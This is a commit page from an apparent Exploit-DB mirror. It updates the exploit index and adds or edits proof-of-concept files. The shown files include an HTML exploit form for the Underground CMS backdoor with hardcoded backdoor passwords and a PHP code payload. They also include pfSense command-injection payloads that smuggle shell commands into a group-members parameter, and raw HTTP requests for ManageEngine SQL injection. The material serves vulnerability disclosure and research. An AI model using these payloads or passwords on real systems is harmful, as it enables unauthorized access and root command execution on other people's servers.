bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2017-11-08

Browse source 
3 new exploits

Pine 4.x - From: Field Heap Corruption
Pine 4.x - 'From:' Heap Corruption
IBM DB2 db2start - Command Line Argument Local Overflow
IBM DB2 db2stop - Command Line Argument Local Overflow
IBM DB2 db2govd - Command Line Argument Local Overflow
IBM DB2 - 'db2start' Command Line Argument Local Overflow
IBM DB2 - 'db2stop' Command Line Argument Local Overflow
IBM DB2 - 'db2govd' Command Line Argument Local Overflow

F-Secure Internet GateKeeper for Linux < 2.15.484 (and Gateway < 2.16) - Privilege Escalation
F-Secure Internet GateKeeper for Linux < 2.15.484 / Gateway < 2.16 - Privilege Escalation

Microsoft Zero Administration Kit (ZAK) 1.0 and Office97 - Backdoor
Microsoft Zero Administration Kit (ZAK) 1.0 / Office97 - Backdoor Access
IBM DB2 - db2start Format String Arbitrary Code Execution
IBM DB2 - db2stop Format String Arbitrary Code Execution
IBM DB2 - db2govd Format String Arbitrary Code Execution
IBM DB2 - 'db2start' Format String Arbitrary Code Execution
IBM DB2 - 'db2stop' Format String Arbitrary Code Execution
IBM DB2 - 'db2govd' Format String Arbitrary Code Execution

Linux Kernel 4.13 (Ubuntu 17.10) - 'waitid()' SMEP/SMAP Privilege Escalation

YaBB 9.11.2000 - search.pl Arbitrary Command Execution
YaBB 9.11.2000 - 'search.pl' Arbitrary Command Execution

Fortigate OS 4.x < 5.0.7 - SSH Backdoor
Fortigate OS 4.x < 5.0.7 - SSH Backdoor Access

Tecnovision DLX Spot - SSH Backdoor
Tecnovision DLX Spot - SSH Backdoor Access

FLIR Thermal Camera F/FC/PT/D - SSH Backdoor
FLIR Thermal Camera F/FC/PT/D - SSH Backdoor Access

Phorum 3.0.7 - 'auth.php3' Backdoor
Phorum 3.0.7 - 'auth.php3' Backdoor Access

Active PHP BookMarks 1.0 - 'APB.php' Remote File Inclusion

Underground CMS 1.x - 'Search.Cache.Inc.php' Backdoor
Underground CMS 1.x - 'Search.Cache.Inc.php' Backdoor Access
pfSense 2.3.1_1 - Command Execution
ManageEngine Applications Manager 13 - SQL Injection
This commit is contained in:
Offensive Security 2017-11-08 05:01:32 +00:00
parent 6f7af333ff
commit d70e1a2cf0
5 changed files with 1108 additions and 17 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

35
files.csv
View file

@ -2733,7 +2733,7 @@ id,file,description,date,author,platform,type,port
21981,platforms/windows/dos/21981.txt,"Monkey HTTP Server 0.4/0.5 - Invalid POST Denial of Service",2002-11-02,anonymous,windows,dos,0
21982,platforms/windows/dos/21982.txt,"Northern Solutions Xeneo Web Server 2.1/2.2 - Denial of Service",2002-11-04,"Tamer Sahin",windows,dos,0
21984,platforms/unix/dos/21984.c,"QNX 6.1 - 'TimeCreate' Local Denial of Service",2002-11-06,"Pawel Pisarczyk",unix,dos,0
21985,platforms/linux/dos/21985.txt,"Pine 4.x - From: Field Heap Corruption",2002-11-07,lsjoberg,linux,dos,0
21985,platforms/linux/dos/21985.txt,"Pine 4.x - 'From:' Heap Corruption",2002-11-07,lsjoberg,linux,dos,0
21986,platforms/windows/dos/21986.pl,"Microsoft Windows Media Player 10 - '.avi' Integer Division By Zero Crash (PoC)",2012-10-15,Dark-Puzzle,windows,dos,0
21991,platforms/windows/dos/21991.py,"QQPlayer 3.7.892 - m2p 'quartz.dll' Heap Pointer Overwrite (PoC)",2012-10-15,"James Ritchey",windows,dos,0
22006,platforms/windows/dos/22006.txt,"EZHomeTech EzServer 7.0 - Remote Heap Corruption",2012-10-16,"Lorenzo Cantoni",windows,dos,0
@ -3025,9 +3025,9 @@ id,file,description,date,author,platform,type,port
23325,platforms/multiple/dos/23325.c,"BRS Webweaver 1.06 - HTTPd 'User-Agent' Remote Denial of Service",2003-11-01,D4rkGr3y,multiple,dos,0
23337,platforms/windows/dos/23337.c,"Avaya Argent Office - DNS Packet Denial of Service",2001-08-07,"Jacek Lipkowski",windows,dos,0
23339,platforms/openbsd/dos/23339.c,"OpenBSD 2.x/3.x - Local Malformed Binary Execution Denial of Service",2003-11-04,"Georgi Guninski",openbsd,dos,0
23347,platforms/linux/dos/23347.txt,"IBM DB2 db2start - Command Line Argument Local Overflow",2003-11-07,SNOSoft,linux,dos,0
23348,platforms/linux/dos/23348.txt,"IBM DB2 db2stop - Command Line Argument Local Overflow",2003-11-07,SNOSoft,linux,dos,0
23349,platforms/linux/dos/23349.txt,"IBM DB2 db2govd - Command Line Argument Local Overflow",2003-11-07,SNOSoft,linux,dos,0
23347,platforms/linux/dos/23347.txt,"IBM DB2 - 'db2start' Command Line Argument Local Overflow",2003-11-07,SNOSoft,linux,dos,0
23348,platforms/linux/dos/23348.txt,"IBM DB2 - 'db2stop' Command Line Argument Local Overflow",2003-11-07,SNOSoft,linux,dos,0
23349,platforms/linux/dos/23349.txt,"IBM DB2 - 'db2govd' Command Line Argument Local Overflow",2003-11-07,SNOSoft,linux,dos,0
23361,platforms/hardware/dos/23361.txt,"Cisco Wireless Lan Controller 7.2.110.0 - Multiple Vulnerabilities",2012-12-13,"Jacob Holcomb",hardware,dos,0
23374,platforms/windows/dos/23374.pl,"Qualcomm Eudora 5.x/6.0 - Spoofed Attachment Line Denial of Service",2003-11-12,"Paul Szabo",windows,dos,0
23375,platforms/linux/dos/23375.txt,"GNU Zebra 0.9x / Quagga 0.96 - Remote Denial of Service",2003-11-12,"Jonny Robertson",linux,dos,0
@ -5992,7 +5992,7 @@ id,file,description,date,author,platform,type,port
1230,platforms/bsd/local/1230.sh,"Qpopper 4.0.8 (FreeBSD) - Privilege Escalation",2005-09-24,kingcope,bsd,local,0
1248,platforms/solaris/local/1248.pl,"Solaris 10 (x86) - DtPrintinfo/Session Privilege Escalation",2005-10-12,"Charles Stevenson",solaris,local,0
1267,platforms/linux/local/1267.c,"XMail 1.21 - '-t' Command Line Option Buffer Overflow Privilege Escalation",2005-10-20,qaaz,linux,local,0
1297,platforms/linux/local/1297.py,"F-Secure Internet GateKeeper for Linux < 2.15.484 (and Gateway < 2.16) - Privilege Escalation",2005-11-07,"Xavier de Leon",linux,local,0
1297,platforms/linux/local/1297.py,"F-Secure Internet GateKeeper for Linux < 2.15.484 / Gateway < 2.16 - Privilege Escalation",2005-11-07,"Xavier de Leon",linux,local,0
1299,platforms/linux/local/1299.sh,"Linux chfn (SuSE 9.3/10) - Privilege Escalation",2005-11-08,Hunger,linux,local,0
1300,platforms/linux/local/1300.sh,"Operator Shell (osh) 1.7-14 - Privilege Escalation",2005-11-09,"Charles Stevenson",linux,local,0
1310,platforms/linux/local/1310.txt,"Sudo 1.6.8p9 - SHELLOPTS/PS4 Environment Variables Privilege Escalation",2005-11-09,"Breno Silva Pinto",linux,local,0
@ -7348,7 +7348,7 @@ id,file,description,date,author,platform,type,port
19139,platforms/multiple/local/19139.py,"Adobe Illustrator CS5.5 - Memory Corruption",2012-06-14,"Felipe Andres Manzano",multiple,local,0
19142,platforms/linux/local/19142.sh,"Oracle 8 - File Access",1999-05-06,"Kevin Wenchel",linux,local,0
19143,platforms/windows/local/19143.c,"Microsoft Windows - 'April Fools 2001' Exploit",1999-01-07,"Richard M. Smith",windows,local,0
19144,platforms/windows/local/19144.txt,"Microsoft Zero Administration Kit (ZAK) 1.0 and Office97 - Backdoor",1999-01-07,"Satu Laksela",windows,local,0
19144,platforms/windows/local/19144.txt,"Microsoft Zero Administration Kit (ZAK) 1.0 / Office97 - Backdoor Access",1999-01-07,"Satu Laksela",windows,local,0
19145,platforms/windows/local/19145.c,"Microsoft Windows NT 4.0/4.0 SP1/4.0 SP2/4.0 SP3/4.0 SP4 - Server Operator to Administrator Privilege Escalation: System Key",1999-01-11,Mnemonix,windows,local,0
19146,platforms/linux/local/19146.sh,"DataLynx suGuard 1.0 - Exploit",1999-01-03,"Dr. Mudge",linux,local,0
19158,platforms/solaris/local/19158.c,"Sun Solaris 2.5.1 PAM & unix_scheme - Exploit",1997-02-25,"Cristian Schipor",solaris,local,0
@ -8207,9 +8207,9 @@ id,file,description,date,author,platform,type,port
23341,platforms/hp-ux/local/23341.c,"HP-UX 10/11 - NLSPATH Environment Variable Format String (1)",2003-04-01,watercloud,hp-ux,local,0
23342,platforms/hp-ux/local/23342.c,"HP-UX 10/11 - NLSPATH Environment Variable Format String (2)",2003-04-01,watercloud,hp-ux,local,0
23343,platforms/hp-ux/local/23343.c,"HP-UX 11 - Software Distributor Lang Environment Variable Local Buffer Overrun",2002-12-11,watercloud,hp-ux,local,0
23344,platforms/linux/local/23344.txt,"IBM DB2 - db2start Format String Arbitrary Code Execution",2003-11-07,SNOSoft,linux,local,0
23345,platforms/linux/local/23345.txt,"IBM DB2 - db2stop Format String Arbitrary Code Execution",2003-11-07,SNOSoft,linux,local,0
23346,platforms/linux/local/23346.txt,"IBM DB2 - db2govd Format String Arbitrary Code Execution",2003-11-07,SNOSoft,linux,local,0
23344,platforms/linux/local/23344.txt,"IBM DB2 - 'db2start' Format String Arbitrary Code Execution",2003-11-07,SNOSoft,linux,local,0
23345,platforms/linux/local/23345.txt,"IBM DB2 - 'db2stop' Format String Arbitrary Code Execution",2003-11-07,SNOSoft,linux,local,0
23346,platforms/linux/local/23346.txt,"IBM DB2 - 'db2govd' Format String Arbitrary Code Execution",2003-11-07,SNOSoft,linux,local,0
23350,platforms/linux/local/23350.c,"TerminatorX 3.8 - Multiple Command-Line and Environment Buffer Overrun Vulnerabilities (1)",2003-11-07,c0wboy,linux,local,0
23351,platforms/linux/local/23351.c,"TerminatorX 3.8 - Multiple Command-Line and Environment Buffer Overrun Vulnerabilities (2)",2003-11-07,Bobby,linux,local,0
23352,platforms/linux/local/23352.c,"TerminatorX 3.8 - Multiple Command-Line and Environment Buffer Overrun Vulnerabilities (3)",2003-11-07,"m00 security",linux,local,0
@ -9319,6 +9319,7 @@ id,file,description,date,author,platform,type,port
43057,platforms/windows/local/43057.txt,"HitmanPro 3.7.15 Build 281 - Kernel Pool Overflow",2017-10-26,cbayet,windows,local,0
43104,platforms/windows/local/43104.py,"Easy MPEG/AVI/DIVX/WMV/RM to DVD - 'Enter User Name' Buffer Overflow (SEH)",2017-10-05,"Venkat Rajgor",windows,local,0
43109,platforms/windows/local/43109.c,"Vir.IT eXplorer Anti-Virus 8.5.39 - 'VIAGLT64.SYS' Privilege Escalation",2017-11-01,"Parvez Anwar",windows,local,0
43127,platforms/linux/local/43127.c,"Linux Kernel 4.13 (Ubuntu 17.10) - 'waitid()' SMEP/SMAP Privilege Escalation",2017-11-06,salls,linux,local,0
1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
5,platforms/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
@ -12318,7 +12319,7 @@ id,file,description,date,author,platform,type,port
20374,platforms/unix/remote/20374.c,"ISC BIND 8.1 - Host Remote Buffer Overflow",2000-10-27,antirez,unix,remote,0
20375,platforms/windows/remote/20375.txt,"Sun Java Web Server 1.1 Beta - Viewable .jhtml Source",1997-07-16,"Brian Krahmer",windows,remote,0
20384,platforms/windows/remote/20384.txt,"Microsoft IIS 4.0/5.0 - Executable File Parsing",2000-11-06,Nsfocus,windows,remote,0
20387,platforms/cgi/remote/20387.txt,"YaBB 9.11.2000 - search.pl Arbitrary Command Execution",2000-11-07,rpc,cgi,remote,0
20387,platforms/cgi/remote/20387.txt,"YaBB 9.11.2000 - 'search.pl' Arbitrary Command Execution",2000-11-07,rpc,cgi,remote,0
20392,platforms/windows/remote/20392.rb,"NetDecision 4.2 - TFTP Writable Directory Traversal Execution (Metasploit)",2012-08-10,Metasploit,windows,remote,0
20394,platforms/unix/remote/20394.c,"BNC 2.2.4/2.4.6/2.4.8 - IRC Proxy Buffer Overflow (1)",1998-12-26,duke,unix,remote,0
20395,platforms/unix/remote/20395.c,"BNC 2.2.4/2.4.6/2.4.8 - IRC Proxy Buffer Overflow (2)",1998-12-26,"jamez & dumped",unix,remote,0
@ -15582,7 +15583,7 @@ id,file,description,date,author,platform,type,port
39215,platforms/windows/remote/39215.py,"Konica Minolta FTP Utility 1.00 - CWD Command Overflow (SEH)",2016-01-11,TOMIWA,windows,remote,21
39218,platforms/windows/remote/39218.html,"Trend Micro - node.js HTTP Server Listening on localhost Can Execute Commands",2016-01-11,"Google Security Research",windows,remote,0
39222,platforms/multiple/remote/39222.txt,"Foreman Smart-Proxy - Remote Command Injection",2014-06-05,"Lukas Zapletal",multiple,remote,0
39224,platforms/hardware/remote/39224.py,"Fortigate OS 4.x < 5.0.7 - SSH Backdoor",2016-01-12,operator8203,hardware,remote,22
39224,platforms/hardware/remote/39224.py,"Fortigate OS 4.x < 5.0.7 - SSH Backdoor Access",2016-01-12,operator8203,hardware,remote,22
39258,platforms/multiple/remote/39258.txt,"Alfresco - '/proxy?endpoint' Server-Side Request Forgery",2014-07-16,"V. Paulikas",multiple,remote,0
39259,platforms/multiple/remote/39259.txt,"Alfresco - '/cmisbrowser?url' Server-Side Request Forgery",2014-07-16,"V. Paulikas",multiple,remote,0
39455,platforms/multiple/remote/39455.txt,"Inductive Automation Ignition 7.8.1 - Remote Leakage Of Shared Buffers",2016-02-17,LiquidWorm,multiple,remote,0
@ -15909,12 +15910,12 @@ id,file,description,date,author,platform,type,port
42724,platforms/windows/remote/42724.rb,"KingScada AlarmServer 3.1.2.13 - Stack Buffer Overflow (Metasploit)",2017-09-14,"James Fitts",windows,remote,12401
42725,platforms/windows/remote/42725.rb,"Cloudview NMS 2.00b - Writable Directory Traversal Execution (Metasploit)",2017-09-14,"James Fitts",windows,remote,69
42726,platforms/hardware/remote/42726.py,"Astaro Security Gateway 7 - Remote Code Execution",2017-09-13,"Jakub Palaczynski",hardware,remote,0
42753,platforms/multiple/remote/42753.txt,"Tecnovision DLX Spot - SSH Backdoor",2017-05-19,"Simon Brannstrom",multiple,remote,0
42753,platforms/multiple/remote/42753.txt,"Tecnovision DLX Spot - SSH Backdoor Access",2017-05-19,"Simon Brannstrom",multiple,remote,0
42778,platforms/windows/remote/42778.py,"Disk Pulse Enterprise 10.0.12 - GET Buffer Overflow (SEH)",2017-09-25,sickness,windows,remote,80
42767,platforms/windows/remote/42767.rb,"Disk Pulse Enterprise 9.9.16 - GET Buffer Overflow (Metasploit)",2017-09-21,Metasploit,windows,remote,80
42780,platforms/windows/remote/42780.py,"Oracle 9i XDB 9.2.0.1 - HTTP PASS Buffer Overflow",2017-09-25,"Charles Dardaman",windows,remote,0
42784,platforms/ios/remote/42784.txt,"Apple iOS 10.2 - Broadcom Out-of-Bounds Write when Handling 802.11k Neighbor Report Response",2017-09-25,"Google Security Research",ios,remote,0
42787,platforms/hardware/remote/42787.txt,"FLIR Thermal Camera F/FC/PT/D - SSH Backdoor",2017-09-25,LiquidWorm,hardware,remote,0
42787,platforms/hardware/remote/42787.txt,"FLIR Thermal Camera F/FC/PT/D - SSH Backdoor Access",2017-09-25,LiquidWorm,hardware,remote,0
42790,platforms/linux/remote/42790.txt,"Tiny HTTPd 0.1.0 - Directory Traversal",2017-09-26,"Touhid M.Shaikh",linux,remote,0
42793,platforms/multiple/remote/42793.rb,"NodeJS Debugger - Command Injection (Metasploit)",2017-09-26,Metasploit,multiple,remote,5858
42806,platforms/java/remote/42806.py,"Oracle WebLogic Server 10.3.6.0 - Java Deserialization",2017-09-27,SlidingWindow,java,remote,0
@ -26431,7 +26432,7 @@ id,file,description,date,author,platform,type,port
20580,platforms/php/webapps/20580.txt,"webid 1.0.4 - Multiple Vulnerabilities",2012-08-17,dun,php,webapps,0
20586,platforms/php/webapps/20586.txt,"Phorum 3.0.7 - 'admin.php3' Unverified Administrative Password Change",2000-01-06,"Max Vision",php,webapps,0
20587,platforms/php/webapps/20587.txt,"Phorum 3.0.7 - 'violation.php3' Arbitrary Email Relay",2000-01-01,"Max Vision",php,webapps,0
20588,platforms/php/webapps/20588.txt,"Phorum 3.0.7 - 'auth.php3' Backdoor",2000-01-06,"Max Vision",php,webapps,0
20588,platforms/php/webapps/20588.txt,"Phorum 3.0.7 - 'auth.php3' Backdoor Access",2000-01-06,"Max Vision",php,webapps,0
20598,platforms/php/webapps/20598.txt,"Jaow CMS 2.3 - Blind SQL Injection",2012-08-17,loneferret,php,webapps,0
20627,platforms/php/webapps/20627.py,"IlohaMail Webmail - Persistent Cross-Site Scripting",2012-08-18,"Shai rod",php,webapps,0
20643,platforms/windows/webapps/20643.txt,"ManageEngine OpUtils 6.0 - Persistent Cross-Site Scripting",2012-08-18,loneferret,windows,webapps,7080
@ -31657,7 +31658,7 @@ id,file,description,date,author,platform,type,port
29910,platforms/php/webapps/29910.txt,"HTMLEditBox 2.2 - 'config.php' Remote File Inclusion",2007-04-25,alijsb,php,webapps,0
29911,platforms/php/webapps/29911.txt,"DynaTracker 1.5.1 - 'includes_handler.php?base_path' Remote File Inclusion",2007-04-25,alijsb,php,webapps,0
29912,platforms/php/webapps/29912.txt,"DynaTracker 1.5.1 - 'action.php?base_path' Remote File Inclusion",2007-04-25,alijsb,php,webapps,0
29913,platforms/php/webapps/29913.txt,"Active PHP BookMarks 1.0 - 'APB.php' Remote File Inclusion",2007-04-25,"ali & saeid",php,webapps,0
29913,platforms/php/webapps/29913.txt,"Active PHP BookMarks 1.0 - 'APB.php' Remote File Inclusion",2007-04-25,"Ali & Saeid",php,webapps,0
29914,platforms/php/webapps/29914.txt,"Doruk100Net - 'Info.php' Remote File Inclusion",2007-04-26,Ali7,php,webapps,0
29915,platforms/php/webapps/29915.txt,"MoinMoin 1.5.x - 'index.php' Cross-Site Scripting",2007-04-26,"En Douli",php,webapps,0
29917,platforms/php/webapps/29917.php,"FlashComs Chat 6.5 - Arbitrary File Upload",2013-11-30,"Miya Chung",php,webapps,0
@ -31841,7 +31842,7 @@ id,file,description,date,author,platform,type,port
30794,platforms/asp/webapps/30794.txt,"VUNET Case Manager 3.4 - 'default.asp' SQL Injection",2007-11-21,The-0utl4w,asp,webapps,0
30375,platforms/ios/webapps/30375.txt,"FileMaster SY-IT 3.1 iOS - Multiple Web Vulnerabilities",2013-12-17,Vulnerability-Lab,ios,webapps,0
30358,platforms/hardware/webapps/30358.txt,"UPC Ireland Cisco EPC 2425 Router / Horizon Box - Exploit",2013-12-16,"Matt O'Connor",hardware,webapps,0
30792,platforms/php/webapps/30792.html,"Underground CMS 1.x - 'Search.Cache.Inc.php' Backdoor",2007-11-21,D4m14n,php,webapps,0
30792,platforms/php/webapps/30792.html,"Underground CMS 1.x - 'Search.Cache.Inc.php' Backdoor Access",2007-11-21,D4m14n,php,webapps,0
30356,platforms/php/webapps/30356.txt,"Wallpaper Script 3.5.0082 - Persistent Cross-Site Scripting",2013-12-16,"null pointer",php,webapps,0
30415,platforms/hardware/webapps/30415.txt,"Cisco EPC3925 - Persistent Cross-Site Scripting",2013-12-21,"Jeroen - IT Nerdbox",hardware,webapps,0
30357,platforms/php/webapps/30357.txt,"iScripts MultiCart 2.4 - Persistent Cross-Site Scripting / Cross-Site Request Forgery / Cross-Site Scripting / Cross-Site Request Forgery / Mass Accounts Takeover",2013-12-16,"Saadi Siddiqui",php,webapps,0
@ -38817,3 +38818,5 @@ id,file,description,date,author,platform,type,port
43117,platforms/php/webapps/43117.txt,"WordPress Plugin Userpro < 4.9.17.1 - Authentication Bypass",2017-11-04,"Colette Chamberland",php,webapps,0
43122,platforms/multiple/webapps/43122.txt,"Logitech Media Server 7.9.0 - 'favorites' Cross-Site Scripting",2017-11-03,"Dewank Pant",multiple,webapps,0
43123,platforms/multiple/webapps/43123.txt,"Logitech Media Server 7.9.0 - 'Radio URL' Cross-Site Scripting",2017-11-03,"Dewank Pant",multiple,webapps,0
43128,platforms/php/webapps/43128.txt,"pfSense 2.3.1_1 - Command Execution",2017-11-07,s4squatch,php,webapps,0
43129,platforms/windows/webapps/43129.txt,"ManageEngine Applications Manager 13 - SQL Injection",2017-11-07,"Cody Sixteen",windows,webapps,9090

Can't render this file because it is too large.

1004
platforms/linux/local/43127.c Executable file
View file

File diff suppressed because it is too large Load diff

4
platforms/php/webapps/30792.html
View file

@ -1,3 +1,4 @@
<!--
source: http://www.securityfocus.com/bid/26521/info
Underground CMS is prone to a backdoor vulnerability.
@ -5,5 +6,6 @@ Underground CMS is prone to a backdoor vulnerability.
Attackers can exploit this issue to gain unauthorized access to the application. Successful attacks will compromise the affected application and possibly the underlying webserver.
Underground CMS 1.4, 1.7, and 1.8 are vulnerable; other versions may also be affected.
-->
<head> <title>Ucms v. 1.8 Np exploit</title> <script type="text/javascript"> function sethost(seite) { document.host.action = seite + 'index.php?&q=test&e=1'; document.all.data.innerHTML = document.host.action; } </script> </head> <body onLoad="sethost('http://www.example.com/')" > <h1>Ucms v. 1.8 Np exploit</h1> Actual Request:<div id="data"></div> <br /> Host:<input type="text" value="http://www.ucmspage.de/" onKeyUp="sethost(this.value);" /> <form id="host" name="host" action="http://www.ucmspage.de/" method="POST"> Password:<input type="text" name="p" value="ZCShY8FjtEhIF8LZ"><br /> <!-- Additional info: You need a password to activate the backdoor we found these passwords: ZCShY8FjtEhIF8LZ (UCMS 1.8) mYM1NHtWtZk2KwrF (UCMS 1.4) wVCQUyhTga5Nmft1 (UCMS [?]) Just go into the file or similar files to find the passwords, for every version there is another password --> Phpcode:<br /> <textarea name="e" rows="20" cols="100"> phpinfo(); ?> &lt;/textarea&gt; <br /> <input type="submit" value="exploit"> </form> </body> <!-- It<49>s just a crime to do such thigs, so please use this exploit just for knowledge and not to destroy the warez pages... thank you for you attention... Have a nice day --> </html>
<head> <title>Ucms v. 1.8 Np exploit</title> <script type="text/javascript"> function sethost(seite) { document.host.action = seite + 'index.php?&q=test&e=1'; document.all.data.innerHTML = document.host.action; } </script> </head> <body onLoad="sethost('http://www.example.com/')" > <h1>Ucms v. 1.8 Np exploit</h1> Actual Request:<div id="data"></div> <br /> Host:<input type="text" value="http://www.ucmspage.de/" onKeyUp="sethost(this.value);" /> <form id="host" name="host" action="http://www.ucmspage.de/" method="POST"> Password:<input type="text" name="p" value="ZCShY8FjtEhIF8LZ"><br /> <!-- Additional info: You need a password to activate the backdoor we found these passwords: ZCShY8FjtEhIF8LZ (UCMS 1.8) mYM1NHtWtZk2KwrF (UCMS 1.4) wVCQUyhTga5Nmft1 (UCMS [?]) Just go into the file or similar files to find the passwords, for every version there is another password --> Phpcode:<br /> <textarea name="e" rows="20" cols="100"> phpinfo(); ?> </textarea> <br /> <input type="submit" value="exploit"> </form> </body> <!-- It<49>s just a crime to do such thigs, so please use this exploit just for knowledge and not to destroy the warez pages... thank you for you attention... Have a nice day --> </html>

27
platforms/php/webapps/43128.txt Executable file
View file

@ -0,0 +1,27 @@
# Exploit Title: pfSense <= 2.3.1_1 Post-Auth Command Execution
# Date: 11-06-2017
# Exploit Author: s4squatch (Scott White - www.trustedsec.com)
# Vendor Homepage: https://www.pfsense.org
# Version: 2.3-RELEASE
# Vendor Security Advisory: https://www.pfsense.org/security/advisories/pfSense-SA-16_08.webgui.asc
1. Description
pfSense <= 2.3.1_1 is affected by a post-authetication os command injection vulnerability in auth.inc via the /system_groupmanager.php page (System menu-->User Manager-->Groups) in the handling of the members[] parameter. This allows an authenticated WebGUI user with
privileges for system_groupmanager.php to execute commands in the context of the root user.
2. Proof of Concept
'`ifconfig>/usr/local/www/ifconfig.txt`'
'`whoami>/usr/local/www/whoami.txt`'
Command output can then be viewed at the webroot:
http://<address>/ifconfig.txt
http://<address>/whoami.txt
Another POC: 0';/sbin/ping -c 10 192.168.1.125;'
3. Solution
Upgrade to the latest version of pfSense (2.3.1_5 on is fixed). This may be performed in the web interface or from
the console. See https://doc.pfsense.org/index.php/Upgrade_Guide Furthermore, the issues can be mitigated by restricting access to the firewall GUI both with firewall rules and by not allowing untrusted users to have accounts with GUI access, and by not granting untrusted administrators access to the pages in question.
Issue was responsibly disclosed to pfSense (security@pfsense.org) on 06/08/2016 and fixed 06/09/2016!
Thank you to Jim P and the pfSense team for the impressive response time.

55
platforms/windows/webapps/43129.txt Executable file
View file

@ -0,0 +1,55 @@
ManageEngine Applications Manager version 13 suffers from multiple post-authentication SQL injection vulnerabilities.
Proof of Concept 1 (name= parameter is susceptible):
POST /manageApplications.do?method=insert HTTP/1.1
Host: 192.168.1.190:9090
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,pl;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 407
Referer: http://192.168.1.190:9090/admin/createapplication.do?method=createapp&grouptype=1
Cookie: testcookie=; am_username=; am_check=; liveapm-_zldp=IEKA1hnqJESNNXc4I4Ts1omY%2FiCOo47Ch6sZEoC7bRr4SfuGTOVfjv2JZAH6cun8; liveapm-_zldt=cfa03604-1dc4-4155-86f7-803952114141; diagnosticsAlarmTable_sortdir=down; JSESSIONID_APM_9090=A16B99B2C0C09EB6060B4372660CFBC3
Connection: close
Upgrade-Insecure-Requests: 1
org.apache.struts.taglib.html.TOKEN=66ef9ed22c8b3a67da50e905f7735abd&addmonitors=0&name=My+App2&description=Description....This+service+is+critical+to+our+business&grouptype=1&mgtypestatus%231001=on&mgtypes_1001=1&mgtypes_1007=0&mgtypes_1008=0&mgtypestatus%231002=on&mgtypes_1002=1&mgtypestatus%231003=on&mgtypes_1003=1&mgtypestatus%231004=on&mgtypes_1004=1&mgtypestatus%231006=on&mgtypes_1006=1&locationid=
Proof of Concept 2 (crafted viewProps yCanvas field):
POST /GraphicalView.do? HTTP/1.1
Host: 192.168.1.191:9090
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,pl;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://192.168.1.191:9090/GraphicalView.do?&method=createBusinessService
Content-Length: 457
Cookie: JSESSIONID_APM_9090=53E8EBC71177607C3A7FE03EB238887E
Connection: close
&method=saveBusinessViewPropsForADDM&viewProps={"displayProps":{"showLabel":true,"showOnlyMGs":false,"showOnlyTopMGs":false,"showOnlyCritical":false,"showOnlyMGStatus":false,"backgroundColorVal":"#FFFFFF","lineColorVal":"#888c8f","textColorVal":"#444444","lineThickness":"2.5","lineTransparency":1,"xCanvas":-23.089912210349002,"yCanvas":0},"coordinates":"{\"totalNumberOfNodes\":0,\"nodeIdList\":[]}"}&haid=10000106&nodeIdVsResourceId={"node_1":"10000106"}
Proof of Concept 3:
POST /GraphicalView.do HTTP/1.1
Host: 192.168.1.191:9090
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,pl;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://192.168.1.191:9090/showapplication.do?haid=10000106&method=showApplication&selectM=flashview&viewid=1
Content-Length: 101
Cookie: JSESSIONID_APM_9090=68C19C45D63C6FD102EB3DF25A8CE39D; testcookie=; am_username=; am_check=; am_mgview=availability
Connection: close
method=getLatestStatusForJIT&haid=10000106&viewid=1&currentime=1509869908111&resourceIDs=(0000106,0)